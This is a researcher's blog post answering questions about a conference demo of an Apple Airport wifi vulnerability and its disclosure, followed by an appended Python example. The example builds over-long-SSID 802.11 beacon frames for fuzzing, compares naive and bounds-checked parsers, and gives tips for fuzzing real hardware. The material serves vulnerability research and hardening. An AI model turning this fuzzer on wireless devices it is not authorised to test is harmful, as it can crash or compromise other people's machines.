I will answer a couple of popular questions about my presentation. Other than this, I feel Jon and I have proved we found vulnerabilities and attempted to work with Apple. This is now a dead subject for me. The presentation and code samples should be up on both our site (erratasec.com) and the Blackhat site soon.
I thought you said it was a hijack yet you only showed a DoS.
Yup, I showed a crash. I didn’t feel the need to do the entire hijack for two reasons: Apple already confirmed that this vulnerability leads to remote code execution (they said so in the advisory here), and everybody that was running a sniffer during my talk now has a copy of the DoS code. The demo had two parts. I showed the crash happening on a 10.4.6 machine since it didn't have any of the Airport patches. I then rebooted into 10.4.8 and the crash no longer happened. I did this to prove that the Airport patches issued on Sept 21st, 2006 fixed the problem I was demoing. The only real change to the Airport code was the security fixes that were issued.
Why not just release everything?
You see, the correspondence between my email address at my former employer and anybody else is not my property. That correspondence is owned by my former employer. For legal reasons I can’t just release it; doing so would violate my employment agreements. This is what got Mike Lynn into a lot of trouble.
You just reversed the patches and found what you then showed on stage.
I find this to be a funny argument. If I have the skills to reverse the patches and do a binary difference analysis of them, why couldn’t I use those same skills to find the bugs in the first place (they weren’t hard to find)? This argument also doesn’t take into account the fact that I showed that the first crash of the exploit occurred on July 15th, 2006, or the emails to Apple helping them build a wifi auditing box (a Linux machine with madwifi patched with LORCON) that pointed them to a vulnerability that was fixed in their patches (a problem with overly long SSIDs). The picture below is from the day I bought the MacBook, July 15th, 2006. This crash occurred because I was fuzzing other devices and the MacBook crashed before I got to run the initial setup.
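The post mentions fuzzing 802.11 devices and an "overly long SSID" problem without showing what such a frame looks like. The following is an added example, not code from the post or from Errata Security: it builds raw beacon frames whose SSID information element exceeds the 32-byte limit the 802.11 spec allows, and contrasts a parser that trusts the one-byte IE length field with one that enforces the bound. The frame layout follows the 802.11 management-frame format; the BSSID, channel, helper names and the claim that this is the shape of the bug the post alludes to are assumptions. Nothing here transmits, so it runs offline; injecting the generated frames (for instance through LORCON, as the post mentions) is left to the reader.

```python
"""
Constructed example: generate 802.11 beacon frames with out-of-spec SSID
lengths and parse them two ways. Not the post author's code; frame fields
follow the 802.11 management-frame layout, everything else is assumed.
"""
import struct

SSID_MAX = 32      # 802.11 caps the SSID at 32 bytes
IE_SSID = 0
IE_RATES = 1
IE_DS = 3

def ie(tag, body):
    """Information element: 1-byte tag, 1-byte length, body.
    The length byte goes to 255, which is what makes an over-long SSID encodable."""
    if len(body) > 255:
        raise ValueError("IE body too long for 1-byte length field")
    return bytes([tag, len(body)]) + body

def build_beacon(ssid, bssid=b"\x02\x00\x00\x00\x00\x01", channel=6, seq=0):
    """Return a complete beacon frame (without FCS) carrying the given SSID bytes.
    bssid/channel are constructed values for the example."""
    fc = struct.pack("<H", 0x0080)            # type=management, subtype=beacon
    duration = struct.pack("<H", 0)
    addr1 = b"\xff" * 6                       # broadcast destination
    addr2 = bssid                             # transmitter address
    addr3 = bssid                             # BSSID
    seqctl = struct.pack("<H", (seq & 0xFFF) << 4)
    header = fc + duration + addr1 + addr2 + addr3 + seqctl   # 24 bytes
    fixed = struct.pack("<QHH", 0, 100, 0x0001)   # timestamp, beacon interval, capability (ESS)
    body = fixed
    body += ie(IE_SSID, ssid)
    body += ie(IE_RATES, bytes([0x82, 0x84, 0x8B, 0x96]))   # basic rates 1, 2, 5.5, 11 Mbit
    body += ie(IE_DS, bytes([channel]))
    return header + body

def parse_ssid_trusting(frame):
    """Naive receiver: trusts the IE length and copies into a fixed 32-byte buffer.
    Returns (copied_ssid, overrun_bytes); a C receiver doing memcpy(buf, data, ln)
    with a 32-byte buf would write overrun_bytes past the end instead of reporting it."""
    ies = frame[24 + 12:]                      # skip MAC header and fixed parameters
    off = 0
    while off + 2 <= len(ies):
        tag, ln = ies[off], ies[off + 1]
        data = ies[off + 2: off + 2 + ln]
        if tag == IE_SSID:
            return data[:SSID_MAX], max(0, len(data) - SSID_MAX)
        off += 2 + ln
    return None, 0

def parse_ssid_checked(frame):
    """Hardened receiver: rejects an SSID IE over the spec bound and any IE whose
    declared length runs past the end of the frame."""
    ies = frame[24 + 12:]
    off = 0
    while off + 2 <= len(ies):
        tag, ln = ies[off], ies[off + 1]
        if off + 2 + ln > len(ies):
            raise ValueError("IE length runs past end of frame")
        data = ies[off + 2: off + 2 + ln]
        if tag == IE_SSID:
            if ln > SSID_MAX:
                raise ValueError(f"SSID IE length {ln} exceeds {SSID_MAX}")
            return data
        off += 2 + ln
    return None

def accepted(frame):
    """True if the checked parser accepts the frame's SSID IE."""
    try:
        parse_ssid_checked(frame)
        return True
    except ValueError:
        return False

def fuzz_ssid_lengths(start=SSID_MAX + 1, stop=255):
    """Yield (length, frame) pairs covering every out-of-spec SSID length."""
    for n in range(start, stop + 1):
        yield n, build_beacon(b"A" * n, seq=n)

if __name__ == "__main__":
    for n, frame in fuzz_ssid_lengths(33, 40):
        ssid, overrun = parse_ssid_trusting(frame)
        print(f"ssid_len={n:3d} frame_len={len(frame):3d} "
              f"trusting overrun={overrun:3d} checked accepts={accepted(frame)}")
```

The trusting parser is the interesting one to read: it never crashes here because Python slices are bounds-safe, so it reports how many bytes a fixed-buffer copy would have overrun. When pointing a fuzzer like this at real hardware, vary the SSID length across the whole 33..255 range rather than a single value, and keep the sequence number moving so the target does not discard the frames as retransmissions.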